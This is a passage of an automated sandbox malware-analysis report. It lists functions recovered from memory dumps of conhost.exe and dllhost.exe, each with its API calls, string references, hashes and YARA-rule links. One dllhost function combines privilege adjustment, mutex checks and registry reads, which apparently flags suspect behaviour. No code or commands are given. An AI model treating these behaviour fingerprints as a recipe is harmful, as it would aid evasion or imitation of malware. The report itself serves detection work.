Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 5e4ed32701053208e9d3b8a2bcceca71f8b0ac64f058bc565f43916057c47231
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 3C51B332311E048ADF94CF19E448BAC7793F354B99F554222EA4A47788FB7AC8C1C791

Function 000001D547809EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D547809ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001D547809FBC

Strings

csm, xrefs: 000001D54780A00E
csm, xrefs: 000001D547809EF6

Memory Dump Source

Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 9216427dfdc600c46dc6c71f37b31bf2f6d300d721ec6af8d9d22f9c2c58b5d8
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 07516832204AC48AEFB48F21D5443987BE2F755B96F1A4117DB9947B95EB38C8D0CB83

Function 000001D54783A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001D54783A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001D54783A7A7

Strings

MOC, xrefs: 000001D54783A76F
RCC, xrefs: 000001D54783A777

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 7b6bb1192652a5e0d0c37ad3ddbf4a813db488dd0e6fe36d00706a62ae844aa4
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 63619A72508BC482EBB08F19E4403DAB7A1F795B99F044216EBD813B99EB7DC1D0CB42

Function 000001D54783AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D54783AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001D54783ABBC

Strings

csm, xrefs: 000001D54783AAF6
csm, xrefs: 000001D54783AC0E

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: d020bb45d75ffdc336c99447d6371f8b1c78dbb06b634e60f98b91c3ea9262b6
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: DC517032200B808BEFB48F2AD54439877A6F354B96F144117EA9947BD5EB3AC5D1CB83

Function 000001D547833950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001D547833972
StrStrW.SHLWAPI ref: 000001D547833990
StrToIntW.SHLWAPI ref: 000001D5478339B7

Part of subcall function 000001D547831A30: OpenProcess.KERNEL32 ref: 000001D547831A56
Part of subcall function 000001D547831A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001D547831A74
Part of subcall function 000001D547831A30: PathFindFileNameW.SHLWAPI ref: 000001D547831A83
Part of subcall function 000001D547831A30: lstrlenW.KERNEL32 ref: 000001D547831A8F
Part of subcall function 000001D547831A30: StrCpyW.SHLWAPI ref: 000001D547831AA2
Part of subcall function 000001D547831A30: CloseHandle.KERNEL32 ref: 000001D547831AB0

Part of subcall function 000001D547833F88: StrCmpNIW.SHLWAPI(?,?,?,000001D54783272F), ref: 000001D547833FA0

Strings

pid_, xrefs: 000001D547833968

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 2bb74df370bb4cb4120e61fe9e1a5ce2ec6805c7ceefbcf371da93883992c485
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 32119331310F8191FF909B2AE8003DA63A6F744782F8041279E5983A94FF6AC985C781

Function 000001D547841FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001D547842027
WriteFile.KERNEL32 ref: 000001D547842304
WriteFile.KERNEL32 ref: 000001D54784234A
GetLastError.KERNEL32 ref: 000001D547842409

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: fe6b0d90a6c60f0d911bd3ffeb53e988dbf7d31a3afa1d03e278679062f14825
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: BED1EE32718E8489EB90CFA9D5442EC37B2F354B99F404216CE5DA7B9AFB74C186D381

Function 000001D5478314A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001D5478314C6
HeapFree.KERNEL32 ref: 000001D5478314D5
GetProcessHeap.KERNEL32 ref: 000001D5478314E2
HeapFree.KERNEL32 ref: 000001D5478314F1
GetProcessHeap.KERNEL32 ref: 000001D547831501

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 0c9d65a8d1ecba206d2d000ab7f080e8b9e6c0304b208ff20d88faf68f9a3efd
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: FF01D732610E90DAEB54DF66A80419D77B2F788F85B094026DB4963728FF74D491C781

Function 000001D5478428F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001D5478428DF), ref: 000001D547842A12

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 16e0e29981202e10ebfe555d1d51592211b92069c4761755f9d4b35594ee60b0
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: C891E232614E5089FFA0CF6699507ED2BA2F358B99F444107DE4A63A85FBB4C4C5E382

Function 000001D547838090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001D5478380BC
GetCurrentThreadId.KERNEL32 ref: 000001D5478380CA
GetCurrentProcessId.KERNEL32 ref: 000001D5478380D6
QueryPerformanceCounter.KERNEL32 ref: 000001D5478380E6

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: c7d28bb6f59473af032823573730bc52b3a8930172ff95ae1054625188d5243e
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: BB112736710F048AEF40CF60E8543A933A4F719759F440E22EA6D967A4EB78C1948381

Function 000001D5478327E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001D5478328CC
StrCpyW.SHLWAPI ref: 000001D5478328E5

Part of subcall function 000001D547833F88: StrCmpNIW.SHLWAPI(?,?,?,000001D54783272F), ref: 000001D547833FA0

Strings

\\.\pipe\, xrefs: 000001D5478328D7

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: bcc21616a665af8cefb32a4710038670d2d9cf784b8434e78253a3f0c8f81cb3
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 2071A336200F8146EFB49E2ED9543EA6796F385B96F450027DE5993B88FF36C680C781

Function 000001D5478080A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001D5478080CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001D547808162

Strings

csm, xrefs: 000001D547808149

Memory Dump Source

Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 78d994aa14f0174a5e6a5148a0d8512db9b757d735f33d0337e00e4f89fd93bc
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 9351D832312E848ADF94CF25E444BAD3B93F754B99F164526DA4A47788FB78C8C1C781

Function 000001D547809AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001D547809BA7

Strings

MOC, xrefs: 000001D547809B6F
RCC, xrefs: 000001D547809B77

Memory Dump Source

Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 445367bf9ac272c1474cde81a48ce4178ebe3615936416496bd07e9b25859b4b
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 1461AA72508FC482EBB08F15E4443DABBA1F795B99F054216EF9807B99EB78C1D0CB41

Function 000001D5478325DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001D5478326C2
StrCpyW.SHLWAPI ref: 000001D5478326D9

Strings

\\.\pipe\, xrefs: 000001D5478326CD

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: b271bf00856705a48a24a708d7f1545c28e135257c627a0d4d1a4adc349c1d73
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 3851D136204F9181EFA4DE2EA6543EA6792F795B82F540027CD5943B89FB3BC484C7C2

Function 000001D547842660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001D547842778
GetLastError.KERNEL32 ref: 000001D54784279D

Strings

U, xrefs: 000001D547842722

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: d0244a63b17811a3f06975e0eef69c9918f9b5f98539d2178aa46657fac22587
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 0F41E632629E8486EF90DF25E4447DAB7A2F388795F804122EE4D87758FF78C481C781

Function 000001D547839178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001D5478391C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001D5478387F7), ref: 000001D547839209

Strings

csm, xrefs: 000001D5478391F6

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 9ee573bb39f63182173a74fb8c1b60342e5b471e5460e41b04e20a3ef98a1c6a
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 61115B32214F8082EB608B19F40429DB7E6F788B89F584222EE8D17B64EF7DC591CB40

Function 000001D547831D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001D547831D69
HeapAlloc.KERNEL32 ref: 000001D547831D77
GetProcessHeap.KERNEL32 ref: 000001D547831D9C
HeapFree.KERNEL32 ref: 000001D547831DAA

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 039eb85ddd578a2d690c086fc3123b12240d9227d9c42b09866a0e4b2fa19f57
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: BA115B31A11F8085EF54CB6AA80829967B2F789FD1F588126DE4E53765FF79D4828380

Function 000001D547831264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001D54783126A
HeapAlloc.KERNEL32 ref: 000001D547831279
GetProcessHeap.KERNEL32 ref: 000001D547831293
HeapAlloc.KERNEL32 ref: 000001D5478312A4

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 78263a6ff3a14f33180f977582ef684d2620488266bba599fd7f4cf607a631fb
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 85E09231601A049AEB548F62D80838D36F2FB8CF46F44C024C90907350FFBD84D9E791

Function 000001D547831000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001D547831006
HeapAlloc.KERNEL32 ref: 000001D547831015
GetProcessHeap.KERNEL32 ref: 000001D547831028
HeapAlloc.KERNEL32 ref: 000001D547831037

Memory Dump Source

Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true

Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: f7ed7103cd2d4480db5571f89765ba38b8e66195bddab985dbcc25ffb18b8986
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: BEE0ED716119049AEB589B62D80429D76B2FB88B56F448025C90907310FF7884D9A651

Analysis Process: dllhost.exePID: 1796, Parent PID: 556COMMON

Executed Functions

Function 0000000140002D4C Relevance: 91.3, APIs: 39, Strings: 13, Instructions: 269
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
GetLastError.KERNEL32 ref: 0000000140002E2A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EFF
RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F2E
